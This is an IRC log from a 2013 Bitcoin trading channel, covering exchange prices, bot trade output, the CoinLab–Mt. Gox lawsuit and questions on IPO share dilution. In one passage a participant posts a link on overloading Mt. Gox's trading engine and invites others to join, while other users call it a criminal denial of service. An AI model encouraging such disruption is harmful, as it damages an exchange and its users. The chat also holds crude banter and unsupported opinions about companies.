May 03 18:22:13 just someone saying hey wtf lemme post a big bid! May 03 18:23:42 i would love to get a fair argument that makes mine look crazy May 03 18:23:58 i'm not tied to it if its a dumb theory May 03 18:24:22 i wear the tinfoil with you ThickAsThieves May 03 18:25:07 "he" or "them" have been buuilding it up and tearing it down again for months May 03 18:25:11 maybe years May 03 18:25:38 the best thing we can do is ride with them May 03 18:25:40 not against them May 03 18:25:46 then we get more power May 03 18:25:53 no sense swimming against the current May 03 18:25:59 ;;ticker May 03 18:26:00 BTCUSD ticker | Best bid: 94.80000, Best ask: 94.99000, Bid-ask spread: 0.19000, Last trade: 94.99000, 24 hour volume: 298905.40822556, 24 hour low: 79.00000, 24 hour high: 114.73100, 24 hour vwap: 94.89145 May 03 18:26:12 i keep missing cheap coins ugh May 03 18:26:23 dont worry May 03 18:26:29 youll get your chance soon May 03 18:26:32 even cheaper May 03 18:28:35 truff1es, the difference here is, more coins = more power May 03 18:28:46 and anyone can get coins May 03 18:28:48 https://bitcointalk.org/index.php?topic=194121.0 May 03 18:29:01 MJR_ mjr_1 mjr___ ^^ May 03 18:29:06 and also, get a bouncer May 03 18:29:12 this is ... ridiculus. May 03 18:29:36 kakobrekla: you are ridiculous May 03 18:29:38 where is mircea_popescu May 03 18:29:44 summon him from the depths May 03 18:29:50 feeding his slaves May 03 18:30:03 Chaang-Noi: are you Thai? May 03 18:30:03 slaves are feeding him May 03 18:30:09 no May 03 18:30:19 wut is ur nationality? May 03 18:30:33 usa May 03 18:30:54 meh May 03 18:31:04 iv not been there for 8 years cuz it was no 1... May 03 18:31:11 but most thai peole think that... May 03 18:31:17 think im crazy for being in thailand May 03 18:31:26 live like king you do May 03 18:32:44 im happy here May 03 18:33:06 kraken is fancy May 03 18:34:04 yes May 03 18:34:06 fancy May 03 18:34:08 that is what matters May 03 18:34:14 on the trading platform May 03 18:34:17 fancyness. May 03 18:34:28 UP THIS MOTHERFUCKER! May 03 18:34:39 ? May 03 18:34:46 up this? May 03 18:34:57 he thinks he is on reedit May 03 18:35:06 https://bitcointalk.org/index.php?PHPSESSID=fdve38tu9rdt438jjvl3kin964&topic=194121.msg2014146#msg2014146 May 03 18:35:11 he calls his exchange motherfucker? May 03 18:35:20 i'm a guy that appreciates some fancy in my software May 03 18:35:29 so you are gay? May 03 18:35:39 not that i know of May 03 18:35:54 [BTCTC] [ASICMINER-PT] 1 @ 1.3187 BTC [+] May 03 18:35:54 possibly by your definition though May 03 18:36:34 tools for pros dont look fancy normally May 03 18:36:40 tools for dorks do on the other hand May 03 18:36:41 lol drons May 03 18:36:55 ah kako bitter? May 03 18:36:56 these things are not mutually attached May 03 18:37:05 pro tools can't look fancy? May 03 18:37:26 fancy is fine, its not a bad thing, but we should look at the things that really do matter May 03 18:37:37 to me it's simply taking pride in your work May 03 18:37:39 fancy is irrelevant May 03 18:37:47 like wearing a suit when you mean business May 03 18:37:49 fancirrelevant May 03 18:37:53 that is my point, fancy is irrelephant May 03 18:37:55 suits are not needed either May 03 18:38:11 we should talk about the toehr important issues May 03 18:38:14 just wear pajamas to that presentation May 03 18:38:24 i dont even own a suit May 03 18:38:40 my car says i dont have to :) May 03 18:38:51 something doesnt have to be totally logical to make sense May 03 18:39:03 it only must work within the framework of the game you are playing May 03 18:39:15 are you michael knight ? May 03 18:39:35 :) May 03 18:39:44 wage slaves wear suit May 03 18:39:48 just ask zuaburg May 03 18:39:56 zukaburg or whatever May 03 18:41:07 i dont lead shit, people just keep folowing my ass... May 03 18:41:56 for a particular definition of leadership, stallman leads his horde May 03 18:42:28 i never saught to be a leader, but at times people do follow May 03 18:43:15 sometimes May 03 18:46:05 i have in the past owned and run a business with 15 people May 03 18:46:13 and i wore my pjs before May 03 18:46:23 staff was mostly uni kids but still May 03 18:46:30 hey listen May 03 18:46:37 whats the fastest way to get coins May 03 18:46:40 in the states May 03 18:46:41 right now May 03 18:46:52 kako i dont know, why? May 03 18:46:59 a friend is asking May 03 18:47:07 i dunno im in yurop May 03 18:47:11 truff pay was based on computer prioven performance May 03 18:47:26 buy from gerald May 03 18:47:29 kako fastcash4bitcoins will sell coins if you but 1000 or more May 03 18:48:02 who is gerald? May 03 18:48:03 truff we had beer in the fridge,. it was clock in out when you wanted May 03 18:48:12 ok tnx goat thats one option May 03 18:48:20 kako how many you need? May 03 18:48:20 fastcash4bitcoins May 03 18:48:41 i dunno 10k usd + May 03 18:48:45 oh his name is gerald? hahaha May 03 18:48:54 ill sell 10k May 03 18:49:00 in us? May 03 18:49:06 ill need a wire May 03 18:49:14 to a us bank account May 03 18:49:19 hrm May 03 18:49:25 i dunno May 03 18:49:32 ill ping you if it comes to it May 03 18:49:37 up to you May 03 18:49:39 okay May 03 18:49:58 https://bitcointalk.org/index.php?topic=87094.0;topicseen May 03 18:50:13 im okay with escrow btw May 03 18:50:32 if you trust the guy... May 03 18:50:46 rgr May 03 18:51:14 id like to avoid being involved at all but as last resort May 03 18:51:23 ok May 03 18:51:38 if the price drops a lot im out May 03 18:52:09 hey guys, is mircea here? May 03 18:52:16 lol May 03 18:52:24 or anybody who remembers me or NashX? May 03 18:52:35 he took a walk May 03 18:52:47 we remember May 03 18:52:47 you mean he is walking his slaves :) May 03 18:53:05 the guy who wanna send coins to void May 03 18:53:12 well i see he's in the room, so maybe he'll be back in a few minutes? May 03 18:53:23 hey kako! May 03 18:53:37 but fastcahs4bitcoin only buys coins ? May 03 18:53:48 hi seongyupyoo May 03 18:53:52 kako you mean sell? May 03 18:54:05 right you do mean buy May 03 18:54:09 https://fastcash4bitcoins.com/ May 03 18:54:10 well, i made lots of changes to nashx and wanted to get your feedback on it May 03 18:54:17 they will sell but its tricky May 03 18:54:20 http://nashx.com/About May 03 18:54:34 they ahve a bunch of hoops and you need to be the right kinda guy and what not May 03 18:54:38 also min is 1000 i think May 03 18:55:02 kako they will sell but its tricky, May 03 18:55:07 truff what? May 03 18:55:58 pjs at work? May 03 18:56:07 the job for them was mostly data entry May 03 18:56:27 so i did not give a fuck as long as they did it quickly and correctly May 03 18:56:52 hanging out for an hour or so after the clocked out drinking my beer was fine May 03 18:57:00 i made like $2,000 a day back then May 03 18:57:07 some at times May 03 18:57:14 mostly just wore streat clothing May 03 18:57:21 some were dressed up, cuz other things May 03 18:57:31 its was a 24 hour operation May 03 18:58:11 so yeah my being in pjs some times worked cuz sometimes i slept there, (or not at all) May 03 18:58:25 is bitinstant working ? May 03 18:58:36 no idea, i dont trust them fuckers May 03 19:00:08 kako you know my issue yesterday? May 03 19:00:21 the 1000 just showed up! wh000000000000000000000000000000000000000000000000000000000!!!! May 03 19:00:41 i still have 5000 blocks to do but got damn May 03 19:00:54 send me an address and ill send you a tip as a test payment May 03 19:01:03 but it will take a while to send May 03 19:01:15 1000 what May 03 19:01:16 btc? May 03 19:01:20 goats May 03 19:01:21 Chaang-Noi: is a btc millionaire May 03 19:01:30 you should sign up for the btc millionaire club May 03 19:01:32 no im not, im a ltc millionair May 03 19:02:02 btc-e has 10% market volume now in the last week May 03 19:02:09 but only in the last 7d May 03 19:02:15 i hope they add a 0 to that May 03 19:02:19 fuck gox May 03 19:03:12 ;;goxlag May 03 19:03:13 MtGox lag is 0.452427 seconds. During this time, light travels 0.000906658642375 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). May 03 19:03:22 guys why not trade directly person to person? May 03 19:03:43 because all the btc millionaires live in the country of europe May 03 19:03:45 that is all i do May 03 19:04:02 online? May 03 19:05:26 what is this kraken.com? May 03 19:05:55 has anyone seen my bitcoin wallet? May 03 19:06:02 it's the one that says "bad motherfucker" May 03 19:06:10 lol jk May 03 19:06:36 but i bet someone has a brainwallet from badmotherfucker just for the homage to pulp fiction May 03 19:08:54 ;;bids 0.1 May 03 19:08:57 There are currently 999362.89 bitcoins demanded at or over 0.1 USD, worth 14823514.2355 USD in total. | Data vintage: 0.0091 seconds May 03 19:09:34 ;;next May 03 19:09:35 expecting to test 108 | upper target: 120-123 | updated by OneFixt at May 3 2013, 08:58 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 7 hours, 11 minutes, and 30 seconds ago May 03 19:12:07 thestringpuller i just signed up. i like it so far May 03 19:12:33 [BTCTC] [ASICMINER-PT] 1 @ 1.3187 BTC [+] May 03 19:12:34 seems like i read about it on hn or something a month ago May 03 19:13:58 [MPEX] [S.MPOE] 5300 @ 0.00069249 = 3.6702 BTC [-] May 03 19:20:28 [BTCTC] [ASICMINER-PT] 2 @ 1.3187 = 2.6374 BTC [+] May 03 19:22:57 cool chart http://www.rtcons.com/wall/10.png May 03 19:25:27 3d? May 03 19:27:18 [BTCTC] [RSM] 1 @ 0.00499 BTC [-] May 03 19:27:45 [BTCTC] [RSM] 1 @ 0.00499 BTC [-] May 03 19:27:57 is there a bitinstant like company for european so far? May 03 19:28:14 bitinstant means failing? May 03 19:29:09 no, mean instan cash deposit in random location May 03 19:29:18 i dream about this May 03 19:30:00 [BTCTC] [S.DICE-PT] 3 @ 0.003622 = 0.0109 BTC [+] May 03 19:31:31 OMG May 03 19:31:32 https://bitcointalk.org/index.php?topic=192122.msg2015989#msg2015989 May 03 19:31:35 how dares he May 03 19:31:47 wheres his 1000k btcs for chairty motherfucker* May 03 19:32:04 *expression apropriate in this case May 03 19:32:09 http://venturebeat.com/2013/05/03/coinlab-sues-mt-gox-for-75m/?utm_source=feedly May 03 19:32:11 THE FUCK? May 03 19:32:15 old May 03 19:32:33 how the fuck did coinlab fuck up that deal May 03 19:32:43 didnt have the infrastructure May 03 19:33:01 all they had was a contract. no plans or capabilities afterwards. May 03 19:33:21 jambo_: that'd be coinlab refusing to comply with the conditions of the contract May 03 19:33:31 correct. May 03 19:33:44 the judgement isnt not. who knows, what is they counter-sue? May 03 19:33:46 so why isnt mtgox suing them? May 03 19:33:56 they should have been to first to sue May 03 19:34:04 they dont need to, they make mad money and they just went around them because they couldn't deliver. May 03 19:34:18 maybe he was too busy running an empire May 03 19:34:34 mtgox is useless to me anyhow May 03 19:34:42 they dont comply with US Federal law on data safety May 03 19:34:49 and have yet to prove they did May 03 19:34:52 really? May 03 19:36:04 yes May 03 19:36:28 banks and other companies that handle personal data must jump through hoops to secure it May 03 19:36:30 mtgox has not done so May 03 19:38:42 source on the claim that coinlab didn't have infrastructure sufficient to handle gox handover? May 03 19:38:48 jambo_? May 03 19:39:19 yes? May 03 19:39:39 sorry benkay, i dont have any sources, my personal opinion. May 03 19:39:45 ah ty May 03 19:39:55 they couldn't deliver, couldn't even get coins for people trying to pay... May 03 19:40:28 I wouldn't be surprised if they counter-sued May 03 19:42:50 that's generally what happens when lawyers get involved in a thing May 03 19:44:23 [BTCTC] [ASICMINER-PT] 7 @ 1.3187 = 9.2309 BTC [+] May 03 19:53:24 biggest problem is : boss of each involved partie is on bitcoin fondation board May 03 19:54:30 foundation is srs bizniss May 03 19:55:06 you can tell by how they resolve conflicts between board members May 03 19:55:23 [BTCTC] [PAJKA.BOND] 20 @ 0.1089 = 2.178 BTC [+] May 03 19:59:52 https://bitcointalk.org/index.php?topic=60548.msg2016542#msg2016542 May 03 20:00:24 damit May 03 20:00:27 nanotube: I know you're there May 03 20:00:33 turn on title display for urls May 03 20:00:43 make gribble useful damnit May 03 20:01:00 ;;title May 03 20:01:01 (title ) -- Returns the HTML ... of a URL. May 03 20:01:54 I want it automatic for bitcointalk urls May 03 20:02:21 i can hear mp shouting i want to fuck your wife May 03 20:02:38 when I get one, Im sure we can negotiate a deal. May 03 20:11:00 you guys think we hit the floor? May 03 20:11:17 ;;ticker May 03 20:11:18 BTCUSD ticker | Best bid: 92.50003, Best ask: 92.90000, Bid-ask spread: 0.39997, Last trade: 92.90000, 24 hour volume: 273106.52176777, 24 hour low: 79.00000, 24 hour high: 114.73100, 24 hour vwap: 94.32426 May 03 20:11:29 definitely not May 03 20:19:10 thanks May 03 20:21:06 [HAVELOCK] [HIM] 3 @ 1.9199 = 5.7597 BTC [-] May 03 20:31:04 [BTCTC] [BITVPS] 1 @ 0.00102 BTC [-] May 03 20:31:22 $avg May 03 20:31:23 benkay: 93.92 May 03 20:32:33 [BTCTC] [ESECURITYSABTC] 6 @ 0.325 = 1.95 BTC [-] May 03 20:33:03 [BTCTC] [BITVPS] 3 @ 0.00101 = 0.003 BTC [-] May 03 20:33:12 [BTCTC] [BITVPS] 16 @ 0.001 = 0.016 BTC [-] May 03 20:37:20 [BTCTC] [ASICMINER-PT] 1 @ 1.318 BTC [-] May 03 20:38:27 [BTCTC] [PAJKA.BOND] 14 @ 0.1089 = 1.5246 BTC [+] May 03 21:03:17 [MPEX] [S.MPOE] 6970 @ 0.00069303 = 4.8304 BTC [+] May 03 21:19:11 [BTCTC] [B.YABMC] 17 @ 0.0161 = 0.2737 BTC [+] May 03 21:23:29 ;;ticker May 03 21:23:29 BTCUSD ticker | Best bid: 92.69332, Best ask: 93.59899, Bid-ask spread: 0.90567, Last trade: 93.59899, 24 hour volume: 261797.37999717, 24 hour low: 79.00000, 24 hour high: 114.73100, 24 hour vwap: 93.76582 May 03 21:26:25 [BTCTC] [S.DICE-PT] 1050 @ 0.0031 = 3.255 BTC [-] May 03 21:26:28 [BTCTC] [S.DICE-PT] 50 @ 0.00301 = 0.1505 BTC [-] May 03 21:26:32 [BTCTC] [S.DICE-PT] 7 @ 0.003 = 0.021 BTC [-] May 03 21:28:16 [BTCTC] [GSDPT] 400 @ 0.0029 = 1.16 BTC [+] May 03 21:29:30 [MPEX] [S.DICE] 50 @ 0.0031 = 0.155 BTC [-] May 03 21:32:01 [BTCTC] [ASICMINER-PT] 1 @ 1.3178 BTC [-] May 03 21:45:48 [BTCTC] [BASIC-MINING] 1 @ 0.416001 BTC [-] May 03 21:45:59 [BTCTC] [BASIC-MINING] 1 @ 0.416 BTC [-] May 03 21:46:08 [BTCTC] [BASIC-MINING] 1 @ 0.415 BTC [-] May 03 21:46:18 [BTCTC] [BASIC-MINING] 1 @ 0.40051 BTC [-] May 03 21:46:35 [BTCTC] [BASIC-MINING] 3 @ 0.4005 = 1.2015 BTC [-] May 03 21:46:41 [BTCTC] [BASIC-MINING] 2 @ 0.400001 = 0.8 BTC [-] May 03 21:47:23 [BTCTC] [BASIC-MINING] 1 @ 0.40001 BTC [+] May 03 21:54:12 here you go May 03 21:54:21 expand your portfilio to realestate http://www.huffingtonpost.com/2013/05/02/trump-soho-condo-selling-for-19m-in-bitcoin-only_n_3203609.html?utm_hp_ref=new-york May 03 21:54:50 18.5k btc May 03 22:16:02 Diablo-D3: sup. you can use the ;;t command, to grab title of the last url posted in chan. May 03 22:17:15 ;;t May 03 22:17:19 Trump SoHo Condo Selling For $1.9M In Bitcoin Only May 03 22:23:01 [03:15:58] Diablo-D3: sup. you can use the ;;t command, to grab title of the last url posted in chan. May 03 22:23:07 yeah but I dont want to do the work May 03 22:27:03 https://dl.dropboxusercontent.com/u/6911896/wat.png May 03 22:27:22 cause its not white May 03 22:29:37 I had green poop as a kid once May 03 22:29:50 I had eaten a bunch of grass pretending I was a cow. May 03 22:29:53 my mom freaked May 03 22:30:02 I was 3-4 yr old May 03 22:30:21 green shit happens May 03 22:30:29 nothing to be worried about May 03 22:31:32 [BTCTC] [ASICMINER-PT] 2 @ 1.31 = 2.62 BTC [-] May 03 22:31:42 [BTCTC] [ASICMINER-PT] 1 @ 1.31 BTC [-] May 03 22:44:07 [BTCTC] [BASIC-MINING] 2 @ 0.42988 = 0.8598 BTC [+] May 03 22:44:17 [BTCTC] [BASIC-MINING] 1 @ 0.4299 BTC [+] May 03 22:44:28 [BTCTC] [BASIC-MINING] 3 @ 0.439 = 1.317 BTC [+] May 03 22:44:39 [BTCTC] [BASIC-MINING] 1 @ 0.44 BTC [+] May 03 22:44:50 [BTCTC] [BASIC-MINING] 1 @ 0.44 BTC [+] May 03 22:45:43 [BTCTC] [BASIC-MINING] 3 @ 0.44 = 1.32 BTC [+] May 03 22:47:29 [BTCTC] [S.DICE-PT] 36 @ 0.00329 = 0.1184 BTC [+] May 03 22:47:52 [BTCTC] [ASICMINER-PT] 1 @ 1.3 BTC [-] May 03 22:48:05 [BTCTC] [ASICMINER-PT] 1 @ 1.2981 BTC [-] May 03 22:48:13 [BTCTC] [ASICMINER-PT] 5 @ 1.298 = 6.49 BTC [-] May 03 22:48:28 [BTCTC] [ASICMINER-PT] 1 @ 1.2975 BTC [-] May 03 22:48:34 [BTCTC] [ASICMINER-PT] 7 @ 1.2974 = 9.0818 BTC [-] May 03 22:54:07 [HAVELOCK] [VTX] 3 @ 0.4615 = 1.3845 BTC [-] May 03 22:55:07 [HAVELOCK] [VTX] 3 @ 0.46140001 = 1.3842 BTC [-] May 03 22:55:34 gox getting lagspammed May 03 22:55:41 pa-the-tic May 03 22:55:50 you need 1 btc May 03 22:56:01 and you can play the goxlag game like a fiddle May 03 22:56:06 [HAVELOCK] [VTX] 2 @ 0.4614 = 0.9228 BTC [-] May 03 22:57:05 http://www.reddit.com/r/Bitcoin/comments/1dmmqy/how_to_break_the_mtgox_trading_engine_with_normal/ May 03 22:57:06 [HAVELOCK] [VTX] 15 @ 0.45750001 = 6.8625 BTC [-] May 03 22:57:22 there's how if anyone wants to play along May 03 22:57:29 check local legalities May 03 22:57:45 yep May 03 22:57:52 well i pointed this out like a month ago May 03 22:58:13 tux knows about it too, doesnt seem to care tho May 03 22:58:46 LOL May 03 22:59:36 i think if multiple people purposefully try it... May 03 22:59:55 legally it's a denial of service and probably a felony in the US May 03 23:00:09 ymmv May 03 23:00:36 oh that how we calling our cryptopumps to army May 03 23:01:43 inb4 black mtgox helicopters landing outside your house May 03 23:02:17 [BTCTC] [ASICMINER-PT] 1 @ 1.2911 BTC [-] May 03 23:02:24 it's not very far removed from telling people how to use loic to shut down paypal May 03 23:02:29 [BTCTC] [ASICMINER-PT] 1 @ 1.291 BTC [-] May 03 23:02:31 and getting prosecuted for doing it May 03 23:02:41 be careful is all i'm saying May 03 23:02:52 [BTCTC] [ASICMINER-PT] 2 @ 1.29 = 2.58 BTC [-] May 03 23:03:12 [BTCTC] [ASICMINER-PT] 1 @ 1.29 BTC [-] May 03 23:03:37 i actual know someone who was indicted for exactly that May 03 23:10:53 anyone know a good site for crafting bitcoin transactions?> May 03 23:11:37 http://brainwallet.org/ May 03 23:15:37 so, how can i add text into my transactions? May 03 23:16:21 like you see on blockchain.info? May 03 23:16:32 thats on top of btc May 03 23:17:16 [BTCTC] [ASICMINER-PT] 1 @ 1.309 BTC [+] May 03 23:17:45 ;;genrate 25000 May 03 23:17:47 The expected generation output, at 25000.0 Mhps, given difficulty of 10076292.8834, is 1.24774687042 BTC per day and 0.0519894529344 BTC per hour. May 03 23:19:50 ;;genrate 2500 May 03 23:19:52 The expected generation output, at 2500.0 Mhps, given difficulty of 10076292.8834, is 0.124774687042 BTC per day and 0.00519894529344 BTC per hour. May 03 23:20:13 ;;genrate 25.2 May 03 23:20:15 The expected generation output, at 25.2 Mhps, given difficulty of 10076292.8834, is 0.00125772884539 BTC per day and 5.24053685578e-05 BTC per hour. May 03 23:21:18 [BTCTC] [PAJKA.BOND] 2 @ 0.1089 = 0.2178 BTC [+] May 03 23:23:13 ;;genrate 240 May 03 23:23:14 The expected generation output, at 240.0 Mhps, given difficulty of 10076292.8834, is 0.0119783699561 BTC per day and 0.00049909874817 BTC per hour. May 03 23:24:17 [BTCTC] [BTC-BOND] 13 @ 0.0101 = 0.1313 BTC [-] May 03 23:41:47 [BTCTC] [PAJKA.BOND] 5 @ 0.1089 = 0.5445 BTC [+] May 04 00:02:33 ;;ticker May 04 00:02:34 BTCUSD ticker | Best bid: 93.84001, Best ask: 94.00000, Bid-ask spread: 0.15999, Last trade: 93.84001, 24 hour volume: 255976.52594918, 24 hour low: 79.00000, 24 hour high: 114.73100, 24 hour vwap: 92.64101 May 04 00:10:10 [BTCTC] [ASICMINER-PT] 1 @ 1.293 BTC [-] May 04 00:11:26 [BTCTC] [ASICMINER-PT] 2 @ 1.292 = 2.584 BTC [-] May 04 00:11:45 [BTCTC] [ASICMINER-PT] 2 @ 1.29104 = 2.5821 BTC [-] May 04 00:25:44 http://www.reddit.com/r/Bitcoin/comments/1dmjyg/bitcoin_from_a_banker_prospective_a_serious/ May 04 00:45:17 ;;calc 122 / (1 - .539) May 04 00:45:18 264.64208243 May 04 00:56:23 ;;seen Syloq May 04 00:56:24 I have not seen Syloq. May 04 00:59:43 [BTCTC] [COG.F] 1 @ 2.4999 BTC [+] May 04 00:59:54 [BTCTC] [B.YABMC] 20 @ 0.016 = 0.32 BTC [-] May 04 01:01:22 [BTCTC] [PAJKA.BOND] 8 @ 0.1089 = 0.8712 BTC [+] May 04 01:06:12 [BTCTC] [ASICMINER-PT] 3 @ 1.282075 = 3.8462 BTC [-] May 04 01:09:32 ThickAsThieves: May 04 01:09:32 see May 04 01:09:33 lol May 04 01:09:48 troll! May 04 01:24:05 [BTCTC] [ASICMINER-PT] 1 @ 1.291 BTC [+] May 04 01:24:36 [BTCTC] [ASICMINER-PT] 1 @ 1.29999 BTC [+] May 04 01:25:44 [BTCTC] [ASICMINER-PT] 1 @ 1.3 BTC [+] May 04 01:26:03 [BTCTC] [BTC-BOND] 1 @ 0.0101 BTC [-] May 04 01:26:29 [BTCTC] [BTC-BOND] 11 @ 0.0101 = 0.1111 BTC [-] May 04 01:27:54 urgh, where's the info on SD's profit for this month? May 04 01:38:27 [MPEX] [S.MPOE] 7320 @ 0.00069549 = 5.091 BTC [+] May 04 01:44:34 https://docs.google.com/spreadsheet/ccc?key=0Aiec3-Eo_yO5dHB2dVdiaEltUHAtTWlBcFhXQVBYeGc#gid=0 May 04 01:44:42 well that's april if that's what you meant May 04 01:45:07 otherwise wise follow the thread on bitcointalk "satoshi dice analysis" by dooglus May 04 01:45:30 45466464 May 04 01:45:34 that guy does fantastisc work May 04 01:47:30 yes he does May 04 01:49:07 [BTCTC] [PAJKA.BOND] 15 @ 0.10889 = 1.6334 BTC [-] May 04 01:50:56 [BTCTC] [PAJKA.BOND] 12 @ 0.10889 = 1.3067 BTC [-] May 04 01:58:34 [BTCTC] [B.YABMC] 5 @ 0.016 = 0.08 BTC [-] May 04 02:09:12 soo how's things May 04 02:09:16 ;;ticker May 04 02:09:17 BTCUSD ticker | Best bid: 94.20001, Best ask: 94.87620, Bid-ask spread: 0.67619, Last trade: 94.87620, 24 hour volume: 252357.52489494, 24 hour low: 79.00000, 24 hour high: 110.20000, 24 hour vwap: 91.73894 May 04 02:10:07 bouncing cat? May 04 02:10:41 we go down...we come back up but not as much...we go down more...come back up but not as much... May 04 02:11:05 just a day after cnbc calls us gold v2.0 May 04 02:12:51 ;;bc,stats May 04 02:12:55 Current Blocks: 234395 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 1476 blocks | Next Difficulty In About: 1 week, 3 days, 6 hours, and 0 seconds | Next Difficulty Estimate: 10015438.6096 | Estimated Percent Change: -0.60394 May 04 02:22:39 [BTCTC] [S.DICE-PT] 110 @ 0.0029 = 0.319 BTC [-] May 04 02:22:43 [BTCTC] [S.DICE-PT] 15 @ 0.00285 = 0.0428 BTC [-] May 04 02:28:39 [BTCTC] [GSDPT] 600 @ 0.0029 = 1.74 BTC [+] May 04 02:38:15 ;;ticker May 04 02:38:16 BTCUSD ticker | Best bid: 95.20103, Best ask: 95.79981, Bid-ask spread: 0.59878, Last trade: 95.79981, 24 hour volume: 251905.49943468, 24 hour low: 79.00000, 24 hour high: 109.21000, 24 hour vwap: 91.63934 May 04 02:38:47 $vwap ^OIX May 04 02:38:48 mod6: ^OIX 1 day: no data 7 day: average: 89.62493193 high: 189.09754758 low: 72.04563121 volume: 3490 btc: 1265.76350754 30 day: no data May 04 02:40:01 whioa 89 ? May 04 02:40:07 remarkably accurate neh May 04 02:42:03 !! Non US travelers with ESTA : #airport #customs computer systems down nationwide - only people with a physical VISA are getting in May 04 02:42:06 bwahaha this is ridiculous May 04 02:46:55 https://www.bitmit.net/en/item/12779-goat May 04 02:47:57 need a 51€ loan May 04 02:50:06 Condition: New May 04 02:50:09 doiesn't looks so new... May 04 02:59:10 ;;ticker May 04 02:59:11 $avg May 04 02:59:11 BTCUSD ticker | Best bid: 97.63317, Best ask: 97.99999, Bid-ask spread: 0.36682, Last trade: 98.00000, 24 hour volume: 246231.22326211, 24 hour low: 79.00000, 24 hour high: 109.00000, 24 hour vwap: 91.29097 May 04 02:59:13 benkay: 91.30 May 04 03:03:27 whats oix May 04 03:03:47 (16:40) < mircea_popescu> remarkably accurate neh << it has a habit of being pretty spot on May 04 03:04:01 ;;google trilema oix May 04 03:04:25 oh oix is the number from the options? May 04 03:05:24 yah, options index May 04 03:06:19 Introducing the OIX pe Trilema - Un blog de Mircea Popescu.: ; Ycombinator continues to suck, jointly and severally pe Trilema - Un ...: ; Ce este lenea ? pe Trilema - Un blog de Mircea Popescu.: ;;ticker May 04 03:08:48 BTCUSD ticker | Best bid: 99.00000, Best ask: 99.49000, Bid-ask spread: 0.49000, Last trade: 99.00000, 24 hour volume: 246793.80722528, 24 hour low: 79.00000, 24 hour high: 106.29000, 24 hour vwap: 91.24555 May 04 03:10:08 [HAVELOCK] [SDICE] 4 @ 0.31999 = 1.28 BTC [+] May 04 03:10:41 https://bitcointalk.org/index.php?topic=193494.msg2020262#msg2020262' May 04 03:10:42 kik May 04 03:16:55 [BTCTC] [BTC-BOND] 3 @ 0.0101 = 0.0303 BTC [-] May 04 03:22:49 [MPEX] [S.MPOE] 2730 @ 0.00069549 = 1.8987 BTC [+] May 04 03:27:27 [BTCTC] [BASIC-MINING] 1 @ 0.44 BTC [+] May 04 03:29:15 mircea_popescu MiningBuddy May 04 03:29:16 fuck May 04 03:29:21 mircea_popescu https://bitcointalk.org/index.php?topic=192122.msg2020453#msg2020453 May 04 03:29:52 dat dude... May 04 03:30:21 lol May 04 03:33:55 So, as a noob in asset markets I come back with a few questions. 1. Isn't the purpose of an IPO to see how much the market is willing to pay? You list for example 1000 shares and then you wait 2 weeks or so for offers. When the IPO is over you start fullfilling orders starting with the highest price per share and going towards the lowest. Did I say something wrong till now? May 04 03:35:30 yes. May 04 03:35:49 an ipo is just that, an initial public offering. it can fulfill any purpose the entity doing it wishes fulfilled. May 04 03:36:01 just as long as it's public, an offering and initial it qualifies. May 04 03:36:13 What do you guys think of the latest SD type game, coinroll? May 04 03:36:22 haven't seen it myself May 04 03:36:44 https://coinroll.it/ May 04 03:37:05 meh. May 04 03:37:25 0 confirmation, but semi-account based. You don't actually register. May 04 03:38:04 Well no fee on each bet is a plus. May 04 03:38:23 But doesn't bring much that SD wasn't already providing. May 04 03:38:30 yeah May 04 03:38:53 basically i don't see anything to set it aside from the whatever, 50 others ? May 04 03:39:44 Thanks mircea. Second question: If I issue 1000 shares, does each share equal 1/1000th of the company? Or can I state in the contract that shares in total acount for, let's say, 51% of the company? May 04 03:41:05 Eh, well it's slightly different and elegant. But it's pretty much the same as all the other clones, yeah. May 04 03:41:37 Tritonio contract always rules. look at some mpex contracts, bitbet for instance ipod 3mn out of a total of 10 May 04 03:42:01 mpoe initially offered 1mn out of 1bn shares, then on a 2nd pass offered another 4mn May 04 03:42:12 Where can I see the April statement for MPOE? May 04 03:42:22 http://trilema.com/2013/mpoe-april-2013-statement/ May 04 03:42:38 thank you May 04 03:44:04 mircea_popescu, When you offer that another 4mn during the second pass, are the old shares "diluted" or it works like if the second pass shares were owned by the issuer from the beginning? May 04 03:44:31 well it can work either way. in this case it worked without dilution. May 04 03:46:29 To work with dillution I suppose you would have to issue more shares, which, depending on the contract, usually needs shareholders agreeing to that, right? Although I am not sure why would they agree to getting dilluted. Unless the expect the company's net worth to rise a lot more (because of the revenue from the sale of the new shares) than the dilution. May 04 03:47:03 let's take this apart. May 04 03:47:47 to dillute you always issue more shares. this is to be done by whoever has the authority to do it. May 04 03:47:55 Yeah, but in this case, it works as profit share. Each share of 1 billion in IPO contract has rights to 1/1'000'000'000 of profits. May 04 03:47:59 if the shares vote, then the shareholders do it. if the shares don't vote then the operator does it May 04 03:48:05 He's not issuing more shares, he's selling more May 04 03:48:34 now, why would someone agree to be diluted, well, it depends. suppose you have a kid and your wife wants another one. May 04 03:48:50 will the kid agree to be diluted ? maybe not. then again maybe he wants a brother/sister. May 04 03:49:03 can go either way. May 04 03:51:08 So if the operator is the one with the right to issue more shares, he could issue them without asking, and possibly decide to keep them all to himself if the contract doesn't prohibit that. Of course he would fuck up the company and everyone would probably sell their shares and leave but I mean if the contract doesn't stop him, he would be basically running away with the shareholders' money. May 04 03:52:56 IDK, usually it's either ask for issuing more shares (like mining companies to buy more stuff) May 04 03:53:06 Namworld, that's my understanding too. The shared already existed in this case and were held by the issuer/operator and he sold more of them in the second pass. I suppose this also means that the operator was getting a bigger portion of the profits of the company before the second pass. May 04 03:53:08 [HAVELOCK] [HIM] 1 @ 1.9449 BTC [+] May 04 03:53:27 (The shares*) May 04 03:53:55 Or a preset issued amount, like x million total. Issuer can sell any portion he wants. That's usually for pre-established businesses that don't need to fund acquisitions or whatever. May 04 03:54:19 I never saw something different yet May 04 03:55:12 Namworld, the second case is btc-mining's case? May 04 03:58:49 That would have been a first case May 04 03:59:45 Tritonio: in that case it equals to non-voting class of shares May 04 03:59:55 Tritonio: ie you're at full mercy of issuer May 04 04:00:07 I thought the idea of the 40% reinvestement was to avoid issuing more shares if not needed.. May 04 04:01:59 another favourite scam is to issue new shares, under new company which asset strips the old one May 04 04:02:07 favourite tunneling technique of capital markets May 04 04:03:50 What's with the "you will be bankrupt" comment... arf May 04 04:04:11 Bondholders lose/gains from Options profit/loss May 04 04:06:20 hm ? May 04 